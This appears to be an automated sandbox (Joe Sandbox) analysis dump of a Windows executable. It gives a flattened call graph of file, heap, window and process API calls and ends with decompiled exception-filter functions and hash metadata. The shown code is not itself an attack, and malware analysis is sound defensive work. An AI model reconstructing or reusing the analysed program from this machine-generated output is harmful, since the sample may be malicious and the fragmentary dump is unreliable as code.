RtlAllocateHeap 3251->3253 3254 4075d4 3252->3254 3253->3254 3254->2919 3259 40642d 3255->3259 3257 403969 GetCommandLineA 3258 401307 GetModuleHandleA 3257->3258 3258->2699 3258->2712 3259->3257 3266 407600 3260->3266 3262 4020c1 FindResourceA 3262->2939 3262->2940 3264 40755b HeapFree 3263->3264 3265 40139a 3263->3265 3264->3265 3265->2703 3265->2704 3267 40760a strlen RtlAllocateHeap 3266->3267 3268 407647 3266->3268 3267->3268 3268->3262 3270 407750 RtlReAllocateHeap 3269->3270 3271 405ec5 GetTempPathA LoadLibraryA 3270->3271 3272 405ee2 GetProcAddress 3271->3272 3275 405f00 3271->3275 3273 405ef2 GetLongPathNameA 3272->3273 3274 405ef9 FreeLibrary 3272->3274 3273->3274 3274->3275 3275->2947 3277 403e5d 3276->3277 3277->3277 3278 407750 RtlReAllocateHeap 3277->3278 3279 403e7a 3278->3279 3280 403e80 memcpy 3279->3280 3281 401c2c 3279->3281 3280->3281 3281->2952 3282->2955 3284 405f22 strncpy strlen 3283->3284 3285 401c56 3283->3285 3286 405f52 CreateDirectoryA 3284->3286 3285->2960 3286->3285 3289 406636 3288->3289 3290 40664d 3288->3290 3300 4067da RtlAllocateHeap 3289->3300 3292 406657 RtlReAllocateHeap 3290->3292 3293 406185 CreateFileA 3290->3293 3292->3293 3293->2985 3293->2986 3295 4066e2 3294->3295 3296 4066c7 3294->3296 3302 40681d 3295->3302 3296->3295 3297 4066cc memset 3296->3297 3299 4066ec 3297->3299 3299->2990 3301 4067f0 3300->3301 3301->3293 3303 40682e HeapFree 3302->3303 3303->3299 3306 406365 3305->3306 3307 406345 SetFilePointer 3305->3307 3308 406370 3306->3308 3309 4063de 3306->3309 3307->3306 3310 4063a3 3308->3310 3313 406389 memcpy 3308->3313 3316 405f90 3309->3316 3310->2994 3313->2994 3314 40640b memcpy 3314->2994 3315 4063eb WriteFile 3315->2994 3317 405fa1 WriteFile 3316->3317 3318 405fc5 3316->3318 3317->3318 3318->3314 3318->3315 3320 406973 CreateFileA 3319->3320 3321 406b14 3319->3321 3320->3321 3322 40699c RtlAllocateHeap 3320->3322 3321->3028 3323 406b0c CloseHandle 3322->3323 3325 4069be 3322->3325 3323->3321 3324 4069c0 ReadFile 3324->3325 3325->3324 3325->3325 3326 406afb HeapFree 3325->3326 3326->3323 3328 407661 strlen 3327->3328 3329 4076ca 3327->3329 3330 407694 RtlReAllocateHeap 3328->3330 3331 407678 RtlAllocateHeap 3328->3331 3332 4076d2 HeapFree 3329->3332 3333 4076b5 3329->3333 3330->3333 3331->3333 3332->3333 3333->3049 3335 4038bc EnumWindows 3334->3335 3338 4038cd 3334->3338 3336 4036aa 3335->3336 3344 40384e GetWindowThreadProcessId GetCurrentThreadId 3335->3344 3341 40390d GetForegroundWindow 3336->3341 3337 4038da GetCurrentThreadId 3337->3338 3339 4038e9 EnableWindow 3337->3339 3338->3336 3338->3337 3340 40681d HeapFree 3339->3340 3340->3338 3342 4036bb MessageBoxA 3341->3342 3343 40391e GetWindowThreadProcessId GetCurrentProcessId 3341->3343 3342->3055 3343->3342 3345 4038ac 3344->3345 3346 40386c IsWindowVisible 3344->3346 3346->3345 3347 403877 IsWindowEnabled 3346->3347 3347->3345 3348 403882 GetForegroundWindow 3347->3348 3348->3345 3349 40388c EnableWindow 3348->3349 3350 4067da RtlAllocateHeap 3349->3350 3351 4038a1 GetCurrentThreadId 3350->3351 3351->3345 3353 40662c 2 API calls 3352->3353 3355 404b24 sprintf 3353->3355 3356 404b55 3355->3356 3357 404b5c memset RegisterClassA 3355->3357 3356->3357 3358 404bb6 AdjustWindowRect 3357->3358 3360 404c25 3358->3360 3361 404c73 3360->3361 3362 404c3c GetSystemMetrics 3360->3362 3365 404cc9 CreateWindowExA 3361->3365 3366 404c89 GetWindowRect 3361->3366 3367 404c7f GetActiveWindow 3361->3367 3363 404c49 3362->3363 3364 404c4c GetSystemMetrics 3362->3364 3363->3364 3370 404c63 3364->3370 3368 404d01 SetPropA 3365->3368 3369 404dbc UnregisterClassA 3365->3369 3366->3370 3367->3365 3367->3366 3372 404d17 ShowWindow 3368->3372 3373 404d39 RtlAllocateHeap CreateAcceleratorTableA 3368->3373 3371 4066bb 2 API calls 3369->3371 3370->3365 3374 404daa 3371->3374 3372->3373 3373->3374 3374->3065 3377 4041e0 3376->3377 3378 4041f0 memset 3377->3378 3379 404243 CreateWindowExA 3377->3379 3378->3379 3381 404291 3379->3381 3382 40154c 3379->3382 3383 40662c 2 API calls 3381->3383 3382->3069 3384 40429f 3383->3384 3386 4047bb 3384->3386 3387 4047cd 3386->3387 3388 4047dc SetWindowLongA SetWindowLongA SetPropA SendMessageA 3387->3388 3389 40482d 3388->3389 3389->3382 3391 404502 3390->3391 3392 404514 memset 3391->3392 3393 40454b CreateWindowExA 3391->3393 3392->3393 3395 401597 3393->3395 3396 40458f 3393->3396 3395->3082 3397 40662c 2 API calls 3396->3397 3398 40459d 3397->3398 3399 4047bb 4 API calls 3398->3399 3399->3395 3401 404f38 3400->3401 3402 404f69 3401->3402 3403 404f50 HeapFree 3401->3403 3404 404f5a HeapFree 3401->3404 3405 404fa3 3402->3405 3406 404f74 HeapFree 3402->3406 3403->3404 3404->3402 3407 404ff3 GetMessageA 3405->3407 3408 404fac PeekMessageA 3405->3408 3417 404f9b 3406->3417 3409 404ffd GetActiveWindow 3407->3409 3408->3409 3410 404fbe 3408->3410 3418 405d3c GetKeyState 3409->3418 3412 404fca MsgWaitForMultipleObjects 3410->3412 3410->3417 3414 404fe2 PeekMessageA 3412->3414 3412->3417 3413 40500b 3415 40501f TranslateMessage DispatchMessageA 3413->3415 3416 40500f TranslateAccelerator 3413->3416 3414->3409 3414->3417 3415->3417 3416->3415 3416->3417 3417->2757 3419 405d50 GetKeyState 3418->3419 3420 405daa GetPropA 3418->3420 3419->3420 3421 405d58 GetKeyState 3419->3421 3422 405dbc 3420->3422 3421->3420 3423 405d60 GetKeyState 3421->3423 3422->3413 3423->3420 3424 405d68 GetFocus GetClassNameA _strncoll 3423->3424 3424->3420 3425 405d94 GetFocus SendMessageA 3424->3425 3425->3420 3425->3422 3427 4073c0 3426->3427 3428 407455 memset 3427->3428 3428->3123 3430 403115 HeapFree 3429->3430 3431 401d78 3429->3431 3430->3431 3431->3132 3433 4024b0 3432->3433 3433->3433 3434 403100 2 API calls 3433->3434 3435 4024c9 3434->3435 3436 403110 HeapFree 3435->3436 3437 4024e1 3436->3437 3438 4030a0 RtlAllocateHeap 3437->3438 3439 4024f0 3438->3439 3440 403110 HeapFree 3439->3440 3441 402508 3440->3441 3442 4030a0 RtlAllocateHeap 3441->3442 3443 402517 3442->3443 3444 407550 HeapFree 3443->3444 3445 402744 3444->3445 3446 403110 HeapFree 3445->3446 3447 40274e 3446->3447 3448 403110 HeapFree 3447->3448 3449 401de5 3448->3449 3449->3144 3451 403ec8 3450->3451 3452 403eeb 3450->3452 3453 403ed1 RtlReAllocateHeap 3451->3453 3454 403ee3 3451->3454 3452->3148 3453->3148 3455 403dc0 RtlAllocateHeap 3454->3455 3456 403ee8 3455->3456 3456->3148 3458 40322e 3457->3458 3459 403292 3458->3459 3461 403287 strncpy 3458->3461 3460 407750 RtlReAllocateHeap 3459->3460 3462 403299 3460->3462 3461->3459 3463 4032aa 3462->3463 3464 40329f strncpy 3462->3464 3463->3195 3464->3463 3466 406324 3465->3466 3467 4062e0 3465->3467 3466->3224 3467->3466 3468 406312 WriteFile 3467->3468 3469 406304 3467->3469 3468->3466 3470 406330 5 API calls 3469->3470 3471 40630c 3470->3471 3471->3224 3483 4064a1 3472->3483 3475 403fcd 3475->3224 3488 403440 3476->3488 3478 4023c5 3479 4035f0 3478->3479 3480 4035fd 3479->3480 3481 407750 RtlReAllocateHeap 3480->3481 3482 403664 3481->3482 3482->3201 3484 406526 RtlAllocateHeap 3483->3484 3487 403fb2 memset 3483->3487 3486 406567 RtlAllocateHeap 3484->3486 3484->3487 3486->3487 3487->3475 3489 40344f 3488->3489 3490 407750 RtlReAllocateHeap 3489->3490 3492 403496 3490->3492 3491 40358c 3491->3478 3492->3491 3492->3492 3493 403500 RtlAllocateHeap 3492->3493 3495 403520 3492->3495 3493->3495 3494 403579 HeapFree 3494->3491 3495->3491 3495->3494 3497 40662c 2 API calls 3496->3497 3498 406077 3497->3498 3499 40609a 3498->3499 3500 40607e CreateFileA 3498->3500 3502 4060bc 3499->3502 3503 40609f CreateFileA 3499->3503 3501 4060f9 3500->3501 3505 406149 3501->3505 3508 406106 RtlAllocateHeap 3501->3508 3502->3501 3504 4060c1 CreateFileA 3502->3504 3503->3501 3504->3501 3507 4060e3 CreateFileA 3504->3507 3506 40615c 3505->3506 3509 4066bb 2 API calls 3505->3509 3506->3236 3507->3501 3510 40613b 3508->3510 3509->3506 3510->3236 3777 404680 3778 404695 3777->3778 3782 40468d 3777->3782 3779 4046c4 RedrawWindow 3778->3779 3781 4046a8 3778->3781 3784 4048d6 RtlEnterCriticalSection 3778->3784 3781->3782 3790 404869 RtlEnterCriticalSection 3781->3790 3782->3779 3786 4048ec 3784->3786 3785 4048fb 3787 404919 RtlLeaveCriticalSection 3785->3787 3786->3785 3786->3787 3788 404902 DeleteObject 3786->3788 3787->3781 3789 40681d HeapFree 3788->3789 3789->3785 3791 404885 3790->3791 3792 4048c7 RtlLeaveCriticalSection 3791->3792 3793 4067da RtlAllocateHeap 3791->3793 3792->3782 3794 4048a9 3793->3794 3795 4048b1 CreateSolidBrush 3794->3795 3796 4048c6 3794->3796 3795->3796 3796->3792 3797 404700 3798 404711 3797->3798 3799 40470b 3797->3799 3800 4048d6 4 API calls 3799->3800 3800->3798 3538 4022c9 3570 4021e5 3538->3570 3539 406170 7 API calls 3539->3570 3540 4062d0 6 API calls 3540->3570 3541 405fd0 WriteFile HeapFree CloseHandle memset HeapFree 3541->3570 3542 403fa3 3 API calls 3542->3570 3543 4023a3 3544 4035d0 3 API calls 3543->3544 3545 4023c5 3544->3545 3547 4035f0 RtlReAllocateHeap 3545->3547 3546 406960 5 API calls 3546->3570 3551 4023d9 3547->3551 3548 4030f0 RtlAllocateHeap RtlReAllocateHeap 3548->3570 3549 406230 9 API calls 3549->3570 3550 402470 3553 407550 HeapFree 3550->3553 3551->3550 3552 4074f0 2 API calls 3551->3552 3554 402415 3552->3554 3555 402485 3553->3555 3556 4074f0 2 API calls 3554->3556 3557 407550 HeapFree 3555->3557 3558 40241f 3556->3558 3559 40248e 3557->3559 3560 4074f0 2 API calls 3558->3560 3561 407550 HeapFree 3559->3561 3562 402428 3560->3562 3564 402497 3561->3564 3565 4074f0 2 API calls 3562->3565 3563 4074f0 strlen RtlReAllocateHeap 3563->3570 3566 407550 HeapFree 3564->3566 3567 402432 3565->3567 3568 4024a0 3566->3568 3569 4074f0 2 API calls 3567->3569 3571 40243d 3569->3571 3570->3539 3570->3540 3570->3541 3570->3542 3570->3543 3570->3546 3570->3548 3570->3549 3570->3550 3570->3563 3574 4036a2 16 API calls 3570->3574 3576 402025 6 API calls 3570->3576 3572 4036a2 16 API calls 3571->3572 3573 402458 3572->3573 3573->3550 3575 402025 6 API calls 3573->3575 3574->3570 3575->3550 3576->3570 3577 4040ca HeapFree 3805 40208e 3806 4036a2 16 API calls 3805->3806 3807 4020a4 3806->3807 3578 4036d1 3579 4036f3 3578->3579 3580 4036d8 3578->3580 3580->3579 3581 4036de SendMessageA 3580->3581 3581->3579 3808 404714 GetWindowLongA 3809 4047a5 NtdllDefWindowProc_A 3808->3809 3810 40472c 3808->3810 3811 40479f 3809->3811 3812 404739 CallWindowProcA 3810->3812 3812->3811 3813 40475a RemovePropA RemovePropA 3812->3813 3815 404781 RevokeDragDrop 3813->3815 3816 404788 SetWindowLongA 3813->3816 3815->3816 3817 4066bb 2 API calls 3816->3817 3817->3811 3582 4044d5 SendMessageA 3818 401b95 FreeLibrary 3819 401b9f ExitProcess HeapDestroy ExitProcess 3818->3819 3583 404358 3584 404365 3583->3584 3585 404377 GetWindowLongA 3584->3585 3586 404393 CallWindowProcA 3584->3586 3589 404836 3585->3589 3590 404859 GetParent 3589->3590 3591 40438c PostMessageA 3590->3591 3592 404846 GetPropA 3590->3592 3591->3586 3592->3591 3593 404856 3592->3593 3593->3590 3829 407e1a sprintf GetPropA 3830 407ecb NtdllDefWindowProc_A 3829->3830 3834 407e4e 3829->3834 3832 407edd 3830->3832 3831 407eaf 3831->3830 3833 407eb4 CallWindowProcA 3831->3833 3833->3832 3834->3831 3835 407e97 HeapFree RemovePropA 3834->3835 3836 407e8d HeapFree 3834->3836 3835->3831 3836->3835 3837 405c1a IsWindowEnabled 3838 405c65 3837->3838 3839 405c2e IsWindowVisible 3837->3839 3839->3838 3840 405c39 GetWindowLongA 3839->3840 3840->3838 3841 405c49 3840->3841 3841->3838 3842 405c59 SetFocus 3841->3842 3842->3838 3595 4042dd 3596 4042f2 3595->3596 3597 404308 3595->3597 3598 4042fc IsWindowEnabled 3596->3598 3603 40434f 3596->3603 3599 404340 3597->3599 3600 40431c SetTextColor 3597->3600 3598->3597 3598->3603 3602 404348 SetBkColor 3599->3602 3599->3603 3600->3599 3601 40432a GetSysColor SetBkColor GetSysColorBrush 3600->3601 3601->3599 3602->3603 3604 4015dd 3606 4015b5 3604->3606 3605 40505e 21 API calls 3605->3606 3606->3605 3607 4015c5 _rmdir 3606->3607 3609 4015fc 3606->3609 3610 401645 3606->3610 3608 401ba4 ExitProcess HeapDestroy ExitProcess 3607->3608 3611 4045fc 4 API calls 3609->3611 3612 4045fc 4 API calls 3610->3612 3613 40160d 3611->3613 3614 401656 3612->3614 3615 4030f0 2 API calls 3613->3615 3616 4030f0 2 API calls 3614->3616 3617 401619 3615->3617 3618 401662 3616->3618 3619 404925 14 API calls 3617->3619 3620 404925 14 API calls 3618->3620 3621 401623 3619->3621 3620->3621 3622 406860 2 API calls 3621->3622 3623 401696 3622->3623 3624 403de0 RtlReAllocateHeap 3623->3624 3625 4016b4 3624->3625 3626 4016fd 3625->3626 3627 4016cf 3625->3627 3629 4020b1 6 API calls 3626->3629 3628 4036a2 16 API calls 3627->3628 3630 4016e5 _rmdir 3628->3630 3631 40170d 3629->3631 3630->3608 3632 401d3f 24 API calls 3631->3632 3633 401756 3632->3633 3634 403de0 RtlReAllocateHeap 3633->3634 3635 40176e 3634->3635 3636 4030f0 2 API calls 3635->3636 3637 40177a 3636->3637 3638 403de0 RtlReAllocateHeap 3637->3638 3639 401792 3638->3639 3640 4030f0 2 API calls 3639->3640 3641 40179e 3640->3641 3642 4020b1 6 API calls 3641->3642 3643 4017ae 3642->3643 3644 401a25 3643->3644 3645 403a18 3 API calls 3643->3645 3646 4074f0 2 API calls 3644->3646 3647 4017c7 3645->3647 3648 401a36 3646->3648 3649 403de0 RtlReAllocateHeap 3647->3649 3650 4074f0 2 API calls 3648->3650 3654 4017e5 3649->3654 3651 401a40 3650->3651 3652 4074f0 2 API calls 3651->3652 3653 401a4b 3652->3653 3655 4030f0 2 API calls 3653->3655 3654->3644 3657 40181c 3654->3657 3656 401a57 3655->3656 3658 406170 7 API calls 3656->3658 3659 405dd5 2 API calls 3657->3659 3660 401a67 3658->3660 3661 40182f 3659->3661 3662 401a87 3660->3662 3663 401a6b 3660->3663 3664 4036f8 25 API calls 3661->3664 3666 405ea0 DeleteFileA 3662->3666 3665 406250 6 API calls 3663->3665 3667 40184a 3664->3667 3668 401a7b 3665->3668 3669 401a92 3666->3669 3670 4030f0 2 API calls 3667->3670 3671 405fd0 5 API calls 3668->3671 3672 402025 6 API calls 3669->3672 3678 401856 3670->3678 3676 401a85 3671->3676 3673 401a97 3672->3673 3674 4036a2 16 API calls 3673->3674 3675 401aad _rmdir 3674->3675 3675->3608 3679 401adf 3676->3679 3682 402118 55 API calls 3676->3682 3677 4019c6 3680 403a79 4 API calls 3677->3680 3678->3677 3681 4074f0 2 API calls 3678->3681 3684 4074f0 2 API calls 3679->3684 3683 4019df 3680->3683 3685 40187a 3681->3685 3682->3679 3686 405e15 2 API calls 3683->3686 3687 401af6 3684->3687 3688 4030f0 2 API calls 3685->3688 3689 4019f3 3686->3689 3690 4074f0 2 API calls 3687->3690 3696 401886 3688->3696 3691 405e90 SetCurrentDirectoryA 3689->3691 3692 401b01 3690->3692 3693 401a07 _rmdir 3691->3693 3694 402761 6 API calls 3692->3694 3693->3608 3697 401b22 3694->3697 3695 4018a0 3699 406230 9 API calls 3695->3699 3696->3695 3698 402118 55 API calls 3696->3698 3700 402025 6 API calls 3697->3700 3698->3695 3701 4018b0 3699->3701 3702 401b2d 3700->3702 3703 401998 3701->3703 3706 405fd0 5 API calls 3701->3706 3704 405ea0 DeleteFileA 3702->3704 3707 406170 7 API calls 3703->3707 3705 401b38 3704->3705 3708 403a79 4 API calls 3705->3708 3709 4018c2 3706->3709 3710 4019a8 3707->3710 3711 401b51 3708->3711 3712 4074f0 2 API calls 3709->3712 3710->3677 3713 406250 6 API calls 3710->3713 3714 405e15 2 API calls 3711->3714 3715 4018de 3712->3715 3716 4019bc 3713->3716 3717 401b65 3714->3717 3718 4074f0 2 API calls 3715->3718 3719 405fd0 5 API calls 3716->3719 3720 405e90 SetCurrentDirectoryA 3717->3720 3721 4018e8 3718->3721 3719->3677 3722 401b79 _rmdir 3720->3722 3723 4074f0 2 API calls 3721->3723 3722->3608 3724 4018f3 3723->3724 3725 4074f0 2 API calls 3724->3725 3726 4018fd 3725->3726 3727 4074f0 2 API calls 3726->3727 3728 401908 3727->3728 3729 4036a2 16 API calls 3728->3729 3730 401923 3729->3730 3730->3703 3731 401939 3730->3731 3732 403a79 4 API calls 3731->3732 3733 401952 3732->3733 3734 405e15 2 API calls 3733->3734 3735 401966 3734->3735 3736 405e90 SetCurrentDirectoryA 3735->3736 3737 40197a _rmdir 3736->3737 3737->3608 3843 40409d RtlAllocateHeap 3844 40629e 3845 4062a0 3844->3845 3845->3845 3846 4062a9 WriteFile 3845->3846 3847 405b1f 3856 4056ef 3847->3856 3850 405b90 SetLastError 3852 405ba2 NtdllDefWindowProc_A 3850->3852 3853 405b7c 3850->3853 3851 405b41 GetPropA 3851->3850 3855 405b51 3851->3855 3852->3853 3854 405b86 DefFrameProcA 3854->3853 3855->3853 3855->3854 3857 405705 3856->3857 3895 40523f 3857->3895 3860 40572e GetPropA 3861 405743 GetParent 3860->3861 3862 405753 3860->3862 3861->3860 3861->3862 3863 4057b6 3862->3863 3870 405a10 3862->3870 3892 4057fa 3862->3892 3864 40598d 3863->3864 3865 4058e8 3863->3865 3866 4057ca 3863->3866 3867 405625 2 API calls 3864->3867 3864->3892 3868 4058f1 3865->3868 3869 4059ea 3865->3869 3871 4057d0 3866->3871 3872 405891 3866->3872 3867->3892 3868->3864 3879 405903 3868->3879 3868->3892 3874 4059fb EnumChildWindows 3869->3874 3869->3892 3870->3864 3876 405a44 3870->3876 3870->3892 3877 4057d9 3871->3877 3882 4057dc 3871->3882 3888 40582d 3871->3888 3875 40589b GetClientRect FillRect 3872->3875 3880 4058c1 3872->3880 3873 405685 RtlAllocateHeap 3873->3892 3874->3892 3875->3880 3881 405aad PostMessageA 3876->3881 3876->3892 3877->3882 3883 40580d 3877->3883 3879->3892 3939 405625 3879->3939 3880->3873 3881->3892 3882->3892 3935 405685 3882->3935 3885 405685 RtlAllocateHeap 3883->3885 3883->3892 3885->3892 3886 40591f 3889 405932 GetWindowLongA 3886->3889 3886->3892 3893 405958 3886->3893 3887 40585c 3891 405685 RtlAllocateHeap 3887->3891 3888->3887 3890 405685 RtlAllocateHeap 3888->3890 3888->3892 3889->3892 3890->3887 3891->3892 3892->3850 3892->3851 3893->3892 3942 405c70 GetActiveWindow GetFocus IsChild 3893->3942 3896 405253 3895->3896 3897 405266 3896->3897 3898 4053be 3896->3898 3902 405288 SystemParametersInfoA 3897->3902 3934 4053b6 3897->3934 3899 4053c8 MapWindowPoints 3898->3899 3900 405429 3898->3900 3953 4050c1 3899->3953 3903 405434 3900->3903 3904 4055e7 3900->3904 3906 40529f GetWindowRect GetWindowRect GetSystemMetrics GetSystemMetrics GetWindowLongA 3902->3906 3902->3934 3908 4055df ReleaseCapture 3903->3908 3913 405449 3903->3913 3907 4055ee 3904->3907 3904->3908 3910 4052f7 GetWindowLongA 3906->3910 3911 4052ef GetSystemMetrics 3906->3911 3912 4055f5 PostMessageA 3907->3912 3907->3934 3908->3934 3915 405318 3910->3915 3916 405308 GetSystemMetrics 3910->3916 3914 40530e GetSystemMetrics 3911->3914 3917 40560c SetCursorPos 3912->3917 3912->3934 3918 405454 3913->3918 3919 40558a GetCursorPos 3913->3919 3920 40531e 6 API calls 3914->3920 3915->3920 3916->3914 3917->3934 3921 40545b 3918->3921 3922 40552d GetCursorPos 3918->3922 3927 40548d 3919->3927 3932 405476 3919->3932 3923 405366 SetCapture PostMessageA 3920->3923 3924 405359 SendMessageA 3920->3924 3925 4054da GetCursorPos 3921->3925 3926 40545e 3921->3926 3922->3927 3922->3932 3929 405384 GetCursorPos LoadImageA SetCursor 3923->3929 3923->3934 3924->3923 3925->3927 3925->3932 3928 405465 GetCursorPos 3926->3928 3926->3934 3930 4054d2 3927->3930 3927->3932 3928->3927 3928->3932 3929->3934 3959 4051f1 SetCursorPos 3930->3959 3958 405093 SetCursorPos LoadImageA SetCursor 3932->3958 3934->3860 3934->3862 3934->3892 3936 4056a5 RtlAllocateHeap 3935->3936 3937 40569b 3935->3937 3938 4056b9 3936->3938 3937->3936 3937->3938 3938->3892 3940 405634 GetPropA GetWindowLongA 3939->3940 3941 405654 3939->3941 3940->3941 3941->3886 3947 405ca3 3942->3947 3948 405ce4 3942->3948 3943 405cac GetClassNameA strcmp 3946 405cd7 GetParent 3943->3946 3943->3947 3944 405cf2 EnumChildWindows 3949 405d35 3944->3949 3950 405d05 3944->3950 3945 405d15 EnumChildWindows 3945->3949 3951 405d2b EnumChildWindows 3945->3951 3946->3943 3946->3948 3947->3943 3947->3946 3947->3948 3948->3944 3948->3945 3949->3892 3950->3949 3952 405d0a SetFocus 3950->3952 3951->3949 3952->3949 3954 4050ce SendMessageA 3953->3954 3955 4051a3 GetWindowLongA 3954->3955 3956 4051d0 MoveWindow 3955->3956 3957 4051b8 GetParent MapWindowPoints 3955->3957 3956->3934 3957->3956 3958->3934 3960 4050c1 3959->3960 3961 405211 SendMessageA 3960->3961 3962 4051a3 4 API calls 3961->3962 3963 405238 3962->3963 3963->3934 3738 404662 3739 404671 3738->3739 3740 404675 DestroyWindow 3739->3740 3741 40467d 3739->3741 3740->3741 3964 404028 3965 404031 3964->3965 3966 40404e 3964->3966 3971 404052 3965->3971 3970 40403f HeapFree 3970->3966 3972 404062 3971->3972 3973 404077 3971->3973 3972->3973 3976 403128 HeapFree 3972->3976 3980 4065be 3973->3980 3976->3972 3977 40660e 3978 4065be 2 API calls 3977->3978 3979 406617 HeapFree 3978->3979 3979->3970 3981 4065d5 HeapFree 3980->3981 3982 4065e7 3980->3982 3981->3981 3981->3982 3983 4065ed HeapFree 3982->3983 3984 404037 3982->3984 3983->3983 3983->3984 3984->3977 3742 40416a 3743 40417a 3742->3743 3747 4041c6 3742->3747 3744 404193 SetTextColor 3743->3744 3745 4041b7 3743->3745 3744->3745 3746 4041a1 GetSysColor SetBkColor GetSysColorBrush 3744->3746 3745->3747 3748 4041bf SetBkColor 3745->3748 3746->3745 3748->3747 3985 401d2d 3986 401d2f 3985->3986 3987 407550 HeapFree 3986->3987 3988 401d38 3987->3988 3749 406bf0 3750 406c03 3749->3750 3751 406bf4 memset 3749->3751 3751->3750 3989 403b30 3990 403b3a 3989->3990 3991 403b62 3990->3991 3992 403b49 GetCurrentProcess TerminateProcess 3990->3992 3992->3991 3993 4044b3 3994 4044bc SendMessageA 3993->3994 3752 401ff5 3753 401ff7 3752->3753 3754 407550 HeapFree 3753->3754 3755 401fff 3754->3755 3756 403110 HeapFree 3755->3756 3757 402009 3756->3757 3758 403110 HeapFree 3757->3758 3759 402012 3758->3759 3760 403110 HeapFree 3759->3760 3761 40201b 3760->3761 3996 405bb5 IsWindowEnabled 3997 405c0b 3996->3997 3998 405bc9 IsWindowVisible 3996->3998 3998->3997 3999 405bd4 GetWindowLongA 3998->3999 3999->3997 4000 405be4 3999->4000 4001 405bfa 4000->4001 4002 405bef SetFocus 4000->4002 4001->3997 4003 405c00 SetFocus 4001->4003 4002->3997 4003->3997 3511 401bb9 3521 403b0b 3511->3521 3513 401bbe 3520 403cc0 SetUnhandledExceptionFilter 3513->3520 3515 401bc3 3527 404150 3515->3527 3519 401bd2 3520->3515 3522 403ad4 3521->3522 3523 403aeb 3522->3523 3524 403add CloseHandle 3522->3524 3525 403af4 HeapFree 3523->3525 3526 403b0a 3523->3526 3524->3523 3525->3526 3526->3513 3528 40415b 3527->3528 3529 404162 DestroyWindow 3528->3529 3530 401bcd 3528->3530 3529->3530 3531 404a13 3530->3531 3532 404a23 3531->3532 3533 404a4d 3532->3533 3534 404925 14 API calls 3532->3534 3535 404a7b 3533->3535 3536 404a62 HeapFree 3533->3536 3537 404a6d HeapFree 3533->3537 3534->3532 3535->3519 3536->3537 3537->3535 4004 40273a 4005 40273c 4004->4005 4006 407550 HeapFree 4005->4006 4007 402744 4006->4007 4008 403110 HeapFree 4007->4008 4009 40274e 4008->4009 4010 403110 HeapFree 4009->4010 4011 402757 4010->4011 3772 404a7e 3773 404ab1 3772->3773 3774 404a8a 3772->3774 3775 404aa3 HeapFree 3774->3775 3776 404a98 HeapFree 3774->3776 3775->3773 3776->3775

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00403B70(_Unknown_base(*)()* _a4) {
                                                                                                                                                  				_Unknown_base(*)()* _t6;
                                                                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                                                                  				_Unknown_base(*)()* _t8;
                                                                                                                                                  				_Unknown_base(*)()* _t9;
                                                                                                                                                  
                                                                                                                                                  				 *0x40b1cc = _a4;
                                                                                                                                                  				_a4 = E00403B30;
                                                                                                                                                  				_t3 =  &_a4; // 0x403b30
                                                                                                                                                  				_t6 =  *_t3;
                                                                                                                                                  				if(_t6 == 0) {
                                                                                                                                                  					_t7 =  *0x40b1d0; // 0x0
                                                                                                                                                  					_t8 = SetUnhandledExceptionFilter(_t7);
                                                                                                                                                  					 *0x40b1d0 = 0;
                                                                                                                                                  					return _t8;
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *0x40b1d0 != 0) {
                                                                                                                                                  						_a4 = _t6;
                                                                                                                                                  						goto ( *0x40a70c);
                                                                                                                                                  					}
                                                                                                                                                  					_t9 = SetUnhandledExceptionFilter(_t6); // executed
                                                                                                                                                  					 *0x40b1d0 = _t9;
                                                                                                                                                  					return _t9;
                                                                                                                                                  				}
                                                                                                                                                  			}







                                                                                                                                                  0x00403b74
                                                                                                                                                  0x00403b79
                                                                                                                                                  0x00403b90
                                                                                                                                                  0x00403b90
                                                                                                                                                  0x00403b96
                                                                                                                                                  0x00403bba
                                                                                                                                                  0x00403bc0
                                                                                                                                                  0x00403bc6
                                                                                                                                                  0x00403bd0
                                                                                                                                                  0x00403b98
                                                                                                                                                  0x00403b9f
                                                                                                                                                  0x00403ba1
                                                                                                                                                  0x00403ba5
                                                                                                                                                  0x00403ba5
                                                                                                                                                  0x00403bac
                                                                                                                                                  0x00403bb2
                                                                                                                                                  0x00403bb7
                                                                                                                                                  0x00403bb7

                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNELBASE(0;@,00401302,00000000), ref: 00403BAC
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00401302,00000000), ref: 00403BC0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID: 0;@$0;@
                                                                                                                                                  • API String ID: 3192549508-1108649562
                                                                                                                                                  • Opcode ID: 17e2f879ba2802d5228fc4bc7392b6e56146e86dabbf6e7f46aef808ca8da191
                                                                                                                                                  • Instruction ID: 0d807a84263d1bb0884b5e8a86140cc1ab27614e37fc76056ab1af4718f505d2
                                                                                                                                                  • Opcode Fuzzy Hash: 17e2f879ba2802d5228fc4bc7392b6e56146e86dabbf6e7f46aef808ca8da191
                                                                                                                                                  • Instruction Fuzzy Hash: BFF0C9B4504300DBC701CF54DA6CA067BF8FB48746F00C53AE905A7261C778D910DB5E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00403CC0() {
                                                                                                                                                  				_Unknown_base(*)()* _t1;
                                                                                                                                                  				_Unknown_base(*)()* _t2;
                                                                                                                                                  
                                                                                                                                                  				_t1 =  *0x40b1d0; // 0x0
                                                                                                                                                  				_t2 = SetUnhandledExceptionFilter(_t1); // executed
